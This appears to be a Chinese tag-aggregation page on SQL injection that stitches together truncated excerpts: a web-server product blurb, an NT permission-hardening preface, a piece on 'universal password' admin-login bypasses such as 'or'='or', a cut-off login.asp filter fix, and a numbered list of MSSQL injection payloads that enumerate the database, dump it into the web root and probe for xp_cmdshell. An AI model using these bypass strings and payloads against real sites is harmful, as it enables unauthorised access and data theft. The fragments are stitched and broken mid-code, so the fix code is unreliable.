标签： SQL注入

　　简介：3Gweb自防御网站服务器（Self-Defending Web Server）是一种整合了OS，自防御系统，HTTP服务器，数据库，Web开发环境，通信和其它软件，以及特殊架构计算机在内的新一代网站服务器装置。它提供一种前所未有的高可信和高安全的综合Web平台，并提供最大的便利性。3Gweb的主功能还是基于http协议的“得到访问者的请求，送回信息”的Web功能，但同时，在其内部植入了最先进的人体“自我防御”机制。因此3Gweb具有超强的抗攻击和抗入侵能力，无论是对“已知攻击”还是“未知攻击”，无论是来自“通信层”，还是“应用层”的攻击。
...

　　前言：在各种网络上的服务器上，只要黑客能成功入侵不同配置的服务器，都会得到一定的权限，比较GUEST或SYSTEM权限等，但这些权限都是由于服务器管理员的配置不当或缺少管理经验而让黑客成功入侵的，只要我们给服务器上各种危险的组件及命令都加上一定的权限设置，那么就会得到最大的安全。下面我们来介绍一下NT系统下权限与黑客的较量，当然的的NT服务器不能是FAT32分区的，你的NT服务器必须采用NTF

摘录如下:
说实话如果一个网站的前台都是注入漏洞,那么凭经验,
万能密码进后台的几率基本上是百分之百.
可是有的人说对PHP的站如果是GPC魔术转换开启,
就会对特殊符号转义,就彻底杜绝了PHP注入.
其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台.
其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有.
如果你用这样的万能密码'or'='or',当然进不去,

实施修复，方法有很多在这里介绍两种，咱们使用第2种

方法1: Replace过滤字符
解决方法:查找login.asp下的
注：（前提 登陆页面有）

把以下代码保存为safe.asp

下面是程序代码********************************************************
"" then
Chk_ba

1、返回的是连接的数据库名
and db_name()>0
2、作用是获取连接用户名
and user>0
3、将数据库备份到Web目录下面
;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--
4、显示SQL系统版本
and 1=(select @@VERSION) 或and 1=convert(int,@@version)--
5、判断xp_cmdshell扩展存储过程是否存在
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')
...